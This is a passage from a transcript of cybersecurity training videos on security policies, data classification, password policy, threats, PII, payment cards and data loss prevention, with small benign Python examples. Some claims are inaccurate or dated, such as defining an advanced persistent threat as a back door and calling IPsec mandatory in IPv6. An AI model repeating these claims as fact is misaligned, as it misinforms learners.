might be done through lunch and learns, through documentation, part of orientation for new employee hires,
and so on. We might even have posters in the workplace, something that's creative and fun and interesting that
gets the point across about these potential security problems. In this video, we talked about social engineering
and phishing.
[Topic title: Acceptable Use Policy. The presenter is Dan Lachance.] In this video, we'll talk about Acceptable
Use Policy. Organizations will have numerous security policies related to how business processes are to be
conducted within the company and also how IT systems are to be used. So the Acceptable Use Policy then is
part of the overall organizational security policy. Now user training and awareness is crucial in order to make
this information known to employees within the company. There needs to be user acknowledgement of
acceptable use policies for IT systems during the employee on-boarding process, when they're newly hired.
We might also consider the use of logon banners on our devices on the network, including Windows and Linux
workstations, so that prior to user logon, there is a banner or an alert that pops up that states something to the
effect that the machine should only be used for business purposes. So the proper use of IT systems then within
the company is part of the Acceptable Use Policy.
The Acceptable Use Policy is a document. And you should really make sure you involve legal counsel when
structuring this for an organization. So, an example of this, in terms of a structure, would be having a purpose
of the Acceptable Use Policy, which normally is to protect employees and business interests, then the scope of
it. For example, we might have an e-mail acceptable use policy versus a VPN acceptable use policy.
Then, of course, it would define unacceptable use. In the case of e-mail, that would be harassment of any kind
sent to others through the mail messaging system. There would also need to be a section that lists
consequences. And, in the case of e-mail unacceptable use, that might be suspension from work. Of course, there
needs to be a definition of terms like there would be in any type of longer document, especially a legal
document.
The e-mail acceptable use policy might include things like no harassment, including sexually harassing e-mail
messages or anything involving racial slurs through e-mail. The Internet acceptable use policy might include
things such as no visiting of pornographic sites. Social media acceptable use policies might prohibit the use of
Facebook or Twitter and other social media. However, in some cases, maybe it's only allowed during breaks.
The consequences – there could be legal prosecution in some cases. It depends on the nature of the infraction.
So, for example, adults viewing adult pornography is technically not illegal in most parts of the world, but
obviously it's unprofessional at work. So even though they might be suspended or demoted or potentially lose
their job, there might not be any type of legal prosecution beyond that.
In this video, find out how to identify details within data ownership and retention policies.
Objectives
[Topic title: Data Ownership and Retention Policy. The presenter is Dan Lachance.] In this video, I'll discuss
data ownership and retention policy.
Data ownership relates to intellectual property or IP. Now, at the industrial level, this would include things
such as patents and trademarks. At the artistic level, it would include things like musical compositions, films,
and artworks that are protected by copyright.
Fair use means that we can use an excerpt of intellectual property while giving attribution to the owner or
creator. So, for example, we might have a search result in a search engine that shows a thumbnail of a
copyrighted image, but not the full size or full scale picture. We also have to think about where data is being
stored when it comes to intellectual property. Whether it's stored on-premises or in the cloud, and what laws or
regulations apply to the data where it's stored.
There are then archiving requirements for data retention. Now there might be laws or regulations in our
specific industry that dictate how long we must keep certain types of records for. Data backups deal with the
storage location which might have to be on-premises or off-site elsewhere like the storage of off-site tapes, or
they could be stored in the public cloud.
Now, in some cases, storage of data in the public cloud could be prohibited unless the public cloud provider
has a data center in the country of origin of that same data and as long as it's manned by personnel that are
residents of that same country. So it's very important that you get legal advice when determining where to store
sensitive data, especially if it relates to customers – whether it's health information, financial information,
address information, and so on.
We also have to consider the cost that's related to data storage be it on-premises or in the cloud especially
when it's being retained for periods of time. Legal discovery can be difficult without a comprehensive data
retention policy. E-discovery is a term that relates to the electronic discovery of digital data that could be used
in court proceedings.
Often with data retention, it's policy-driven automation that categorizes and migrates data that is no longer
considered to be live and needed right now and stores it instead in long-term storage. Now often, and this is
true also on the public cloud, long-term storage is slower. So it might be older magnetic hard disks as opposed
to the faster solid-state drives. And as such it's cheaper.
So even most public cloud providers will charge a lesser rate to store things long-term for archiving than to
store data that's frequently accessed. The proper disposal of sensitive data after the retention period has been
exceeded is crucial. So again there might be regulations that require certain data sanitization techniques to be
applied to make sure no data remnants remain.
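To make the policy-driven migration idea a bit more concrete, here's a minimal sketch in Python; the folder paths and the 365-day threshold are placeholder assumptions, not part of any specific product. It simply moves files that haven't been touched within the retention window into a cheaper archive location.

import os
import shutil
import time

LIVE_DIR = "/data/live"        # placeholder path for frequently accessed data
ARCHIVE_DIR = "/data/archive"  # placeholder path for cheaper long-term storage
RETENTION_DAYS = 365           # placeholder value; real retention periods come from laws or regulations

cutoff = time.time() - RETENTION_DAYS * 86400  # anything not modified since this timestamp gets archived

for name in os.listdir(LIVE_DIR):
    src = os.path.join(LIVE_DIR, name)
    # Migrate files that have not been modified within the retention window
    if os.path.isfile(src) and os.path.getmtime(src) < cutoff:
        shutil.move(src, os.path.join(ARCHIVE_DIR, name))
        print("Archived:", name)

A real solution would also log each move, handle name collisions, and eventually dispose of archived data with an approved sanitization method once its retention period expires.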
In this video, learn how to identify details within data classification policies.
Objectives
[Video description begins] Topic title: Data Classification Policy. The presenter is Dan Lachance. [Video
description ends]
In this video, I'll go over data classification policy. Data integrity relates to how trustworthy and authentic data
is considered. This can be assured in various ways. At the technical control level, file hashing is used to take
the unique bit-level data and apply it against an algorithm that results in a unique value. That unique value is
called a hash. Now when we run that algorithm against that same data in the future, if there's a change, the
hash value will be different. So we'll know that something has changed.
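To make the file hashing idea concrete, here's a minimal sketch in Python; the file name and the stored baseline are just placeholders for illustration. We compute a SHA-256 hash of a file, keep it as a baseline, and later recompute it to detect any change.

import hashlib

def file_hash(path):
    # Read the file in chunks and feed it to SHA-256 so large files don't need to fit in memory
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

baseline = file_hash("contract_a.docx")   # hash recorded when the file was known to be good

# Later, recompute and compare; any change to the file produces a different hash value
if file_hash("contract_a.docx") != baseline:
    print("Integrity check failed: the file has changed")
else:
    print("Integrity check passed: the file is unchanged")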
Administrative controls, including things like separation of duties, can also assure data integrity or business
process integrity. Separation of duties ensures that no single person has control of an entire business process
from beginning to end, especially as it relates to IT and security. Mandatory vacations not only ensure that
people are refreshed; while they're on vacation, the people filling their roles will be able to notice any anomalies if there are
any – and not only anomalies, but also inefficiencies in how things are done. Change management processes are a
structured and organized way to apply changes in an organization. Now as it relates to IT, it's important that
this be outlined and known to related personnel so that changes are applied in a controlled manner and we have
a way to roll back out of changes if there's a problem. Dual control requires that at least two people be present
in order to complete a process.
So, for example, if our data backups are encrypted, we might require two technicians to be present – each
having a part of a decryption key. And when those two parts are put together, we have the single key that's
required to decrypt that backup. Cross-training can also be very important. In the IT world, technicians are
used to reducing single points of failure, whether that's in a power supply, at the disk level, server level, and so
on.
At the personnel level, with cross-training, we've got more than one person able to perform a duty so
that if one person is unable to perform a duty or if they leave the organization or they're busy on another
project, we've got somebody else that can perform that task. Succession planning is also crucial so that we
have got someone in mind that we train over time that can fill the shoes of somebody that will be moving on to
other departments, other projects, or even perhaps moving into retirement. A data classification policy
identifies different types of data. Now why would we want to do that? Why can't all data be treated the same?
Well, some data is more sensitive than other data. And so, with the data classification policy, we might look
into database records or files to determine if there is something sensitive like financial transactions, health
records, whether records or files contain Personally Identifiable Information or PII. Things like e-mail
addresses or social security numbers – that's all considered PII. And in some cases, we might be required due
to regulations or laws, to encrypt data that is considered sensitive. Also, this data classification can be related
to data retention requirements. So perhaps data that is not considered PII – Personally Identifiable Information
– doesn't need to be retained. Whereas financial transactions, due to the industry we're in might need to be
retained for a number of years.
So this is an ongoing task. The reason this is true is because as we get new records or new files placed on a file
server, they need to be classified. So we need some way to determine does that new data contain financial
information, health information, and so on. And, as such, it should be classified accordingly. So, if it's got
financial information in it, it should be classified in some way that we can identify that and that would go
along with our data retention of financial information for numerous years. We can automate data classification.
It's not as if somebody has to be watching for any new or changed database records or files to flag them
manually.
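Before we look at the Windows tooling, here's a minimal sketch of what content-based classification might look like conceptually, written in Python; the folder, the "usd" keyword, and the social-security-number-style pattern are illustrative assumptions, and real classification rules are considerably more precise.

import os
import re

# Illustrative patterns only; production rules would be far more specific
PATTERNS = {
    "FinancialData": re.compile(r"\busd\b", re.IGNORECASE),
    "PII": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),  # SSN-like pattern
}

def classify(folder):
    tags = {}
    for name in os.listdir(folder):
        path = os.path.join(folder, name)
        if not os.path.isfile(path):
            continue
        with open(path, errors="ignore") as f:
            text = f.read()
        # Record every label whose pattern appears somewhere in the file's content
        tags[name] = [label for label, pattern in PATTERNS.items() if pattern.search(text)]
    return tags

print(classify("C:/Contracts"))  # placeholder folder, echoing the demo that follows

In practice, the matched labels would be written back as metadata tags on the files rather than just printed.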
So we can automate the classification through metadata tagging. Metadata is extra information that gets stored
with existing data. As an example, Microsoft's File Server Resource Manager is a role service in the Windows
Server Operating System that does just this. Let's go take a look at it right now. On my file server, I've gone to
Local Disk (C:) into the Contracts folder where I've got a file called Contract_A. Now, if I right-click on a file
here in the Windows Server OS and go to the Properties option, if there's a Classification tab visible
[Video description begins] The Contract_A Properties dialog box is open. It includes tabs such as General,
Classification, Security, and Details. [Video description ends]
because there may not be, it means that the File Server Resource Manager option is installed.
[Video description begins] He clicks the Classification tab. Under this, there are two sections. The first section
displays the added property's name and value. In this, the Department property is added with the Value
(none). The second section is Value. It displays the values and their description that can be added to a
property. [Video description ends]
So clearly it's installed here. So I'm going to Cancel all of that. On my server, I'm going to go to my Start button
and look for file server. And what I want to do here is run the File Server Resource Manager tool. Now this
does numerous things,
[Video description begins] The File Server Resource Manager window opens. It is divided into three sections.
The first section is navigation pane. In this, the File Server Resource Manager (Local) node is selected by
default. It includes subnodes such as Quota Management, File Screening Management, and Classification
Management. The second section displays the information on the basis of the selection made in the first
section. The third section includes the File Server Resource Manager expandable node. [Video description
ends]
but we're only interested here in Classification Management. So I'm going to click under Classification
Management on the left, on Classification Properties. Now over on the right, I see any existing Local
properties that are tied to
[Video description begins] In the navigation, under the Classification Management subnode, he clicks the
Classification Properties option. As a result, its information is displayed in the second section. The second
section displays the information of local properties in a tabular format. The table provides information
regarding the Scope, Usage, Type, and Possible Values of the local properties. [Video description ends]
the specific server that can be used to flag files and any Global ones come from Active Directory. For example
here, there's a Department Global property that we can use to flag files and tie them to a department. Now we
can also build our own properties. If I were to right-click on Classification Properties on the left, I could
choose to Create Local Property. I'm going to make one here called FinancialData.
[Video description begins] The Create Local Classification Property dialog box opens. It contains a General
tab. Under this, there are the following fields: Name and Description, which are text boxes and Property type,
which is a drop-down list box. In the Name text box, he enters FinancialData. [Video description ends]
Down below for the Property type, I'm going to choose Yes/No. So either it is or is not financial data. But
notice I've got other data types here like Number, Multiple Choice List, String, and so on. Then I'm going to
click OK. And notice that the FinancialData Local property now shows up in the list.
[Video description begins] The FinancialData property gets added to the table of the local properties. [Video
description ends]
Let's go back to our file. So I'm going to switch back to the Windows Explorer tool. I'm going to right-click on
the Contract_A file again and go back into Properties. And under Classification, notice that we've got both
Department and FinancialData available here. So Department for instance is selected.
[Video description begins] The Contract_A Properties dialog box opens again. Under the Classification tab,
Dan refers to the FinancialData property that gets added in the first section under the Description
property. [Video description ends]
And down below, I can choose which department that this file might be tied to. Now of course, I'm doing this
manually. We'll talk about the automation in a moment. So maybe this is related to the Finance department. So
up above, we see Department equals now Finance.
[Video description begins] He selects the Department property in the first section. Then in the Value section,
he selects Finance. This value gets added in the first section against the Description property. [Video
description ends]
For FinancialData, I can either choose Yes or No or None value. So again, I'm doing this manually. But, if I
deem that there is financial data stored in this document, I would choose Yes.
[Video description begins] He selects the FinancialData property in the first section. In the Value section,
three radio buttons appear: Yes, No, and None. He selects the Yes radio button. [Video description ends]
So we can now see the file is flagged for the Finance department. And yes, it does have FinancialData. So I'm
going to click OK. But what about automating that? Well, let's go back to the File Server Resource Manager.
On the left, I'm going to right-click on Classification Rules to create one.
[Video description begins] The File Server Resource Manager window opens again. Under the Classification
Management subnode, he right-clicks the Classification Rules option. As a result, a shortcut menu appears
from which options can be selected. He selects the Create Classification Rule option. [Video description ends]
[Video description begins] The Create Classification Rule dialog box opens. It includes various tabs such as
General, Scope, and Classification. Under the General tab, in the Rule name text box, he enters Rule1. [Video
description ends]
And under the Scope tab, down below, I'm going to click Add. I have to tell it where I want to scour or scan
the file server looking for files that might be considered financial data files. So I'm going to tell it to scan drive
C. Under the Classification tab, I'm going to make sure it's set to Content Classifier. And down below I'm going
to click the Configure button.
[Video description begins] He clicks the Classification tab. Under this, there are two sections: Classification
method and Property. The Property section includes the Configure button. [Video description ends]
What I'm going to look for here is a String value within files.
[Video description begins] The Classification Parameters dialog box opens. It contains the Parameters tab.
Under this, there are the following two sections: Specify the strings or regular expression patterns to look for
in the file or file properties and File name pattern (optional). In the first section, the content is displayed in a
tabular format with no entries. The following column headers are displayed: Expression Type, Expression,
Minimum Occurrences, and Maximum Occurrences. Under the Expression Type column header, there is a
drop-down list box. [Video description ends]
Let's say that if it's got usd for U.S. dollars, I consider that to be a financial file.
[Video description begins] Under the Expression Type column header, he selects the String option from the
drop-down list. Under the Expression column header, he enters usd. [Video description ends]
So we can get much more detail than that with our expression, but that's what we're going to go with in this
example. So I'm going to click OK. Now when we do find files on drive C that contain USD, I want to flag it
as FinancialData equals Yes. I'll choose that from here.
[Video description begins] He switches back to Create Classification Rule. Under the Classification tab, in the
Property section, there are two fields: Choose a property to assign to files and Specify a value. Below the first
field, there is a drop-down list box, he selects the FinancialData option. As a result, in the second field, the
Yes option gets auto filled. [Video description ends]
And then I'll click OK. Now at any point in time over on the right in the Actions panel, you see you can Run
Classification With All Rules. That's still manual. What I could do is Configure Classification Schedule. So I
could enable a schedule,
[Video description begins] In the Actions section, he clicks the Configure Classification Schedule option. As a
result, the File Server Resource Manager Options dialog box opens. It includes various tabs such as Email
Notifications, and Automatic Classification. The Automatic Classification tab is selected by default. It includes
the Schedule section which contains an Enable fixed schedule checkbox. [Video description ends]
determine which days of the week I want this to run on and at what time, and it will run my classification rules
for me. Data classification can also go hand in hand with authentication. So how people
authenticate will determine what type of data they'll be able to get to. For example, sensitive data might require
Multi-Factor Authentication that otherwise would be unavailable to users. Role-based access to data is very
common where we limit data access to job roles on a need to know basis. This is most often implemented
through the use of groups that might have permissions to files flagged as being FinancialData. In this video we
talked about data classification policy.
[Topic title: Password Policy. The presenter is Dan Lachance.] In this video, we'll take a look at password
policy. Password policies are important and they're defined within an organization to determine things like
how long passwords can exist before they need to be changed, how complex passwords need to be, and so on.
Here, in Windows Server 2012, let's take a look at group policy where we can centrally define password
settings for all users in the Active Directory domain. To begin, I'll click on the Start button and I'll type in
group. Now when the Group Policy Management tool pops up, I'll go ahead and click on that to start it. Now
once we're in the Group Policy Management tool [The Group Policy Management window opens. It is divided
into two sections. The first section is navigation pane. The second section displays the information on the basis
of the selection made in the first section. In the first section, under the Group Policy Management expandable
node, there is Forest:fakedomain.local subnode. Under this subnode, there is Domains subnode. Under this,
there is fakedomain.local subnode. Under this subnode, there is Default Domain Policy option. Its information
is displayed in the second section.] in the left-hand navigator, I'm going to right-click on the Default Domain
Policy, GPO or Group Policy Object. And I'm going to choose Edit.
Here within the Default Domain Policy on the left, [Now the Group Policy Management Editor window opens.
It is also divided into two sections. This time in the navigation pane, under the Default Domain Policy
[SRV2012-1.FAKEDOMAIN.LOCAL] Policy expandable node, there are the following two subnodes:
Computer Configuration and User Configuration.] I'm going to go down under Computer
Configuration. [Under the Computer Configuration subnode, there are the following two subnodes: Policies
and Preferences.] So I'm going to expand Policies. Then I'm going to expand Windows Settings. And finally
under that, I'll open up Security Settings. Now this is where we're going to see Account Policies. And, if I
expand that, it finally reveals the Password Policy. If I select that on the right, I see all the individual settings
like Enforce password history.
Here it's set to remember the last 24 passwords. So the idea here is we don't let people reuse passwords
because that essentially means the same password is in effect for longer periods of time which reduces security
for that user account. Here the Maximum password age is currently set to 42 days. [In the second section, Dan
clicks the following individual setting: Maximum password age. As a result, the Maximum password age
Properties dialog box opens. It contains two tabs: Security Policy Setting and Explain. Under the Security
Policy Setting, there is the following field: Password will expire in.] I'm going to set that to 30 so that we
require password changes every 30 days for security.
I'm going to set the Minimum password age to 10 days [He repeats the same procedure for the next individual
setting which is Minimum password age.] because I don't want people immediately changing their password to
some variation of what they used before because it's easier for them to remember. The Minimum password
length here – I'm going to bump up to 8 characters for security reasons. I can also ensure that password
complexity requirements are enabled so that we've got to use things like uppercase and lowercase characters
and so on.
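To see what settings like these amount to in practice, here's a minimal sketch of how an application might validate a new password against similar rules; the minimum length of 8 and the history depth of 24 mirror the values discussed above, and the complexity check is a simplified stand-in for the Windows rules.

import re

def password_ok(new_password, recent_passwords, min_length=8, history=24):
    # Enforce minimum password length
    if len(new_password) < min_length:
        return False
    # Simplified complexity rule: require uppercase, lowercase, and a digit
    if not (re.search(r"[A-Z]", new_password)
            and re.search(r"[a-z]", new_password)
            and re.search(r"\d", new_password)):
        return False
    # Enforce password history: reject reuse of any of the last 'history' passwords
    if new_password in recent_passwords[-history:]:
        return False
    return True

print(password_ok("Winter2024go", ["Summer2023go"]))  # True: long enough, complex, not reused
print(password_ok("short1A", []))                     # False: too short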
The other important thing to bear in mind here is that we've done this in the Default Domain Policy. [He
switches back to the Group Policy Management window.] Even though you can build other GPOs in Active
Directory that might apply to other organizational units and it will let you configure the Password Policy
settings, they don't work. So the only way that we can set standard Password Policy settings for everyone
inside an Active Directory domain is by doing it in a domain-level policy. It will not work in a GPO linked to
an OU; even though it looks like it will, if you test it, you'll find that it does not.
After completing this video, you will be able to recognize various network configurations and perform network
reconnaissance.
Objectives
Exercise Overview
[Topic title: Exercise: Network Architecture and Reconnaissance. The presenter is Dan Lachance.] In this
exercise, you'll begin by explaining why IPv6 is considered more secure than IPv4. You'll then explain why
DMZs are relevant. Then you'll outline the Cloud Security options. You will list the differences between log
review and packet captures. And finally, you'll list differences between data retention and data classification.
Now pause the video and perform each of these exercise steps and then come back here to view the results.
Solution
IPv4, from its inception in the 1970s, was never designed with security in mind. So all security solutions that
exist today for IPv4 are essentially afterthoughts and Band-aids. IPv6 was designed with security in mind. It
has built-in support for IPsec. IPsec is actually a requirement. IPsec also works with IPv4.
A DMZ is a demilitarized zone. It's a special network segment that sits between the Internet and an internal
network. An external firewall protects the DMZ from the Internet. And an internal firewall protects the internal
network from the DMZ. IT services that need to be publicly visible should always be placed on the DMZ.
When it comes to the cloud, there are a couple of security options available.
We have on-premises connectivity to the cloud from our local network or our data center. This can be done
through a site-to-site VPN which encrypts the connection or a dedicated leased line which bypasses the
Internet. On the encryption side, there are encryption options for data in transit – so data being transmitted as
well as data at rest – data being stored. We can also encrypt data prior to storing it in the cloud using any
encryption tools that we choose.
Some cloud providers also offer security as a service in the cloud – things like firewalling, spam
filtering, and virus scanning. Log review and packet capturing are different from one another. Now
they're both forms of reconnaissance. Logs, however, result from the operation of an operating system or an app,
or they could be the result of activity auditing. And logs can and should be forwarded to other hosts for safekeeping,
especially for devices that exist in a DMZ.
Packet captures, on the other hand, are a copy of network transmissions that can be used to troubleshoot
performance issues as well as to establish a baseline of normal network activity. Data retention is related to
archiving requirements for long-term storage of data that needs to be around. This could be due to legal or
regulatory reasons and it's related to our data backup policy.
Data classification allows us to identify different types of data. Usually this is done by adding metadata, for
example – to files stored on a file server, we might add additional attributes such as the department or project
it's tied to. It's designed for the protection of sensitive information. So certain permissions can be granted to
certain classifications of data. So the two therefore – data retention and data classification – are related.
During this video, you will learn how to identify assets and related threats.
Objectives
[Topic title: Threat Overview. The presenter is Dan Lachance.] In this video, I'll do a threat overview.
According to ISO document 7498-2, a threat is defined as being a potential violation of security. And, as
cybersecurity analysts, it's our job to be able to identify assets and threats to them and to put in place security
controls that can mitigate or completely remove that possibility of threat materialization.
The first thing we have to consider is what are assets? What has value to the organization? Now that can
include numerous things including IT systems that the company relies on, or it could be specific data like
customer shopping habits data. Now then we have to look at what type of data is the most valuable because many
organizations produce many different types of data. So we have to think about the IT systems that produce the
data and then the process workflow that results in the data.
So that might mean, for example, a certain web application that employees follow through a specific process to
fill in a form to submit data that ends up resulting in something of value to the organization. Maybe it's in the
accounts payable department or accounts receivable. Asset examples include things like Personally Identifiable
Information or PII. This is any type of information that uniquely identifies an individual, things like an e-mail
address, their financial history, their social security number, and so on.
Then there's corporate data that might be considered confidential. Certainly, things like accounting data would
fall under that category. Data regarding mergers and acquisitions, trade secrets. There's also intellectual
property or IP. And this could be related to industrial processes or methods. Or it could be artistic such as
copyrights for artwork or for music.
Other assets include payment card information. So, if we deal with cardholder data whether they are debit
cards or credit cards, that data has to be stored in a secured manner and transmitted securely. And as such, it
could be very important for an organization to safeguard that type of information. Realized threats will have a
negative effect on business operations. Now this comes in a number of ways such as loss of revenue, such as
when we get malware infections that bring IT systems down for a period of time. It can also include things like
loss of reputation, loss of consumer confidence.
Sources of these threats include malware and social engineering, which is trickery – tricking someone into divulging
something sensitive – and that could lead to some other type of security breach such as a physical security breach. Other
threats include natural disasters like floods or storms, which might result in power outages and of course other
man-made threats such as war and terrorism.
Data needs to be categorized for it to be taken care of properly so that we can mitigate threats against it. Data
categorization uses metadata. Metadata is extra information about the actual data itself. So we could manually
configure metadata about documents stored, for instance, on a Microsoft SharePoint Server where we might
select items from a drop-down list maybe to flag a document as being at a certain stage within a business
process.
We could also look at automated solutions like Windows File Server Resource Manager – FSRM. For
example, we might have files that we look at and, if they contain credit card numbers, we would flag them as
sensitive. Now, whether we're talking about solutions like SharePoint Server or FSRM, they could both be
manual or automated. We categorize data because then job-based roles allow appropriate access to this
categorized data.
After completing this video, you will be able to recognize known, unknown, persistent, and zero-day threats.
Objectives
So then we take a look at the impact on business operations, business processes, including relevant data. This
way we can focus on selecting the best mitigating security controls to reduce the impact of potential risks.
Known threats include things like viruses that have a known signature that can be detected by a malware
scanner. Another example of a known threat is a firewall misconfiguration. Ideally, we will know about it
before it's known by malicious users that can then take advantage of that firewall misconfiguration.
Unknown threats are called zero-day threats when it comes to malware. This means we've got some kind of an
exploit that's available, but the vendor doesn't yet know about it. Malicious users however do. So they may or
may not require the deployment of malware to actually exploit this vulnerability. So, for example, it would be
a weakness in an operating system that still isn't known to the vendor.
APT stands for advanced persistent threat. Essentially, it's a back door. Now a back door allows an alternative
way to get into a system. And it's often built by developers during development phases to allow them to quickly
get in and test something while bypassing access control mechanisms. The problem is that sometimes those aren't
removed, or they could be put in place by malicious software. So, essentially, it would allow attackers to use a
compromised system for a long period of time. And this has happened in the past.
Think about Nortel, for example, where Chinese hackers had compromised their network and been in for
almost a decade. Let's take a look at a threat classification criteria example. So the first thing we have to
consider is the threat source. In this case, let's assume it's external. We then have to think about the threat
agent. How is that threat being delivered? How is it being materialized? And in our example, let's say it's
ransomware. Now ransomware is a form of malware that encrypts files and then demands payment to reveal a
decryption key.
So what would the threat motivation be? Because that's the next idea we have to think about. In this case, it
would be financial – receiving a payment and ideally providing a decryption key to the victim after receiving
the payment. The next thing to consider when classifying threats is the threat intention. Is it malicious as is the
case with ransomware where the motivation is financial or is it some kind of an accident?
The next thing we have to think about is the impact that the threat will have against business processes, IT
systems, and data. So will there be any downtime? Will we have denial of service to an IT system that
otherwise would be available for legitimate use? Will we have data disclosure to unauthorized parties or will
there perhaps be illegal use of sensitive information such as Personally Identifiable Information or PII?
So it's important that we categorize and prioritize threats and think about all of the criteria related to threats.
[Topic title: Personally Identifiable Information. The presenter is Dan Lachance.] In this video, I'll discuss
Personally Identifiable Information. In the IT field, Personally Identifiable Information is simply called PII or
P-I-I. These are unique attributes that are related to an individual. PII is stored with some kind of agency or
institution or private sector firm. And there are laws and regulations in place in different industries and
different parts of the world for protection of PII.
One standard is that PII owners must be notified that their personal information is being collected. They also
must be notified about how it's going to be used. Examples of PII include personal information such as a
person's full name, their birthdate, their driver's license number, Social Security Number, e-mail
address, their mother's maiden name, and anything related to biometrics like a fingerprint scan or a retinal
scan.
PII harvesting, for example, would be used to trick victims into updating passwords on a fraudulent web site.
So the harvesting part comes in because the malicious user is reaping the rewards of somehow tricking people
into divulging sensitive personal information. And often, this could come in the form of an e-mail message that
looks like a legitimate message from the bank asking a user to reset their password, for instance.
The best defense here is user training. User training should emphasize the problems that can occur with e-mail
file attachments, especially those that the user was not expecting, but there are even risks with opening file
attachments a user was expecting. Of course, links to other web sites and e-mail messages should always be
treated very cautiously. Also, links posted on social media sites, whether it's Twitter or Facebook,
especially if they relate to an individual, might be a way to lure a user into clicking a link, often due to human
curiosity. And then, once that happens, the machine could be infected.
PII falls under organizational data classification rules. So, for example, we might configure a PII
confidentiality impact level of low, medium, or high depending on the content within database records or files
on a file server. PII can be stored on premises. And depending on rules or regulations and laws about how that
PII is treated, when it's on premises it might need to be encrypted. There might need to be backup copies stored
off site and so on.
In the cloud, we have to think about storage of PII where it might not be allowed due to laws and regulations.
Or if it is, it might be required on cloud provider data center equipment within national boundaries. And again,
encryption for data at rest or stored data is often associated with PII as well as while it's being transmitted.
PII owners, as we mentioned, must be notified of how their PII will be used. So, if their personal information is
going to be shared with other vendors within or outside of national boundaries, they must know about it and
they must consent to this usage.
After completing this video, you will be able to explain payment card data.
Objectives
[Topic title: Payment Card Information. The presenter is Dan Lachance.] In this video, I'll talk about Payment
Card Information. Payment card types include things like credit cards, debit cards, and gift cards to name a
few. It's important that there is consumer trust for this system to work – trust in the cards, the data stored on
them, and the systems that are used to pay for services and products. It's also very convenient for consumers
even across the Internet to use a payment card to purchase something. But with good things come bad things in
terms of malicious users.
Payment cards account for a large portion of cybercrime, especially organized crime, with different groups around the
world. For example, Carder's Market is a closed group on the Internet where things like credit card PINs and
PayPal account credentials are for sale to the highest bidder. Now, it's hard to believe that this would actually
exist on the Internet and anyone could connect from anywhere. But that's just it – not anyone can connect. You
have to be invited and there's very careful scrutiny by other members to make sure that it's not Law
Enforcement trying to infiltrate these groups. And often, payment for these types of nefarious items is done
through Bitcoins. That's because Bitcoin payments are largely unregulated. However, transactions are normally
publicly recorded on the blockchain. But, you know, there are ways around everything. That traceability could be
circumvented by using a Bitcoin tumbler or an anonymizer.
Magnetic strip cards generally don't encrypt data transmitted to the terminal. But the reason I say generally is
because there are different proprietary solutions for strip cards and the terminal devices that they are used
against. But generally, it is not encrypted. Magnetic strip cards can contain any type of information, really. It
depends on what the creator decides to burn into the magnetic strip – things like the type of card, account
numbers, account types, the account holder name, perhaps an expiration date for the card, even a PIN, or a
hash of the PIN – but it varies.
Chip cards on the other hand are also called smart cards. And they do encrypt data transmitted to the terminal.
Chip cards are interesting because they actually contain a very thin microchip embedded within the card.
However, these aren't quite as widely used as the magnetic strip cards yet in all parts of the world, but it is
changing. The good thing about chip cards is they are much more difficult to forge than magnetic strip cards
are.
NFC stands for Near Field Communication. And this is a contactless payment mechanism that's becoming
more and more popular. It's a short-range wireless communication, approximately 20 centimeters maximum. And
this is one of the reasons why it can be difficult to intercept signals because someone would have to be very,
very close. However, it is possible.
There are also Smartphone apps that allow you to use NFC for payment. And it will automatically take funds
out of a certain account through your bank or through your credit card and so on. So transmissions are
encrypted. However, this is one of those things – for example, on a smartphone – that you should disable if you
don't use it. That's part of hardening: turning off things that we don't use to reduce the attack surface.
PCI DSS stands for Payment Card Industry Data Security Standard. These are security standards that need to
be met by merchants, financial institutions, or point-of-sale vendors that work with cardholder data – whether
it's credit cards or debit cards and so on. So PCI DSS requirements include the use of network and host-based
firewalls configured properly. Configured properly means that a firewall by default should deny everything.
And you should only allow specific things that you know should be allowed into or out of a host or a network.
PCI DSS requirements also require hardening in the sense of changing system defaults like default passwords,
default names of wireless networks, and so on. Transmission of cardholder data must always be encrypted.
And in some cases, it will have to be encrypted as it's stored, as well. Another requirement is having up-to-date
antimalware solutions running on systems related to cardholder data and the use of unique user accounts at that
specific organization. So we can track who did what at what date and time.
Another requirement – and there are many beyond what we're listing here – would include restricted physical
access to cardholder data itself. Now that's where the encryption of data at rest kicks in. Because if, by some
chance a malicious user gets physical access to cardholder data – if it's encrypted, that's yet another hurdle that
they must circumvent. And ideally, if it's strong encryption, they won't be able to crack it.
Another requirement is auditing to track who's been doing what as related to cardholder information and
periodic security testing.
[Topic title: Intellectual Property. The presenter is Dan Lachance.] In this video, I'll talk about intellectual
property. Technicians often refer to intellectual property as IP, not to be confused with Internet Protocol. IP is
a type of data. At the industrial level, it would include things like trade secrets, patents, and trademarks. At the
artistic level, it relates to copyrights. Some examples of intellectual property would include things like secret
ingredients or recipes or music. Paintings also fall under intellectual property and it would be subject to
copyright law just like music would.
Scientific research and the results thereof are also considered intellectual property as are specific industrial
processes used by certain organizations, for example, in the manufacturing process. These are the types of
things that we would want to keep secret to remain competitive. Now there might be some intellectual property
ownership issues. Consider the example of university research data created through government funding that
finds some kind of important medical result.
Who owns that intellectual property – the university, the researchers, or the government that funded the
research? DRM stands for Digital Rights Management and this is another aspect of protecting intellectual
property. It prevents things like piracy. If you think back to the days of software being distributed on floppy
disks, vendors back then would use methods such as writing the files to those floppy disks in nonstandard
ways and that was their form of copyright protection at the time.
Another example would be things like digital watermarks on images or videos to prevent piracy, such as at movie
screenings. These days, software and gaming Digital Rights Management often checks in with an Internet
server first before commencing or granting access to the software, or in the case of gaming, before the game
will begin. An example of this would include Microsoft Product Activation where if we were to install – for
example – a Windows operating system, then we would have to make sure it gets registered with Microsoft's
activation servers before we can fully use that operating system and receive updates.
In this video, you will learn how to control how valuable data is used.
Objectives
[Topic title: Data Loss Prevention. The presenter is Dan Lachance.] Aside from people, the most valuable
asset organizations have is information. In this video, I'll discuss data loss prevention. Data loss prevention is
often referred to in the industry as DLP. It controls how valuable data is used and protected. It deals with
intellectual property, confidential corporate data, as well as personally identifiable information or PII.
DLP prevents data leakage – data disclosure – outside of the organization to unauthorized users. DLP risks
include things such as malware – an infected or compromised system or network might use spyware agents
installed on hosts to gather data that is normally protected. And therefore, that data would then be disclosed
outside of the organization. Naturally, proper and up-to-date malware scanners help mitigate that risk.
Other ways that data loss can occur are through social media links. So, for example, users using Facebook or
Twitter might post sensitive information there either intentionally or unwittingly. So we need controls in place
to watch for that. Then there are things like mobile devices. These are a big risk in today's computing
environment, yet at the same time they allow people to be very productive and mobile.
Laptops, tablets, and smartphones are computers, of course, and they should be treated as such. Most people
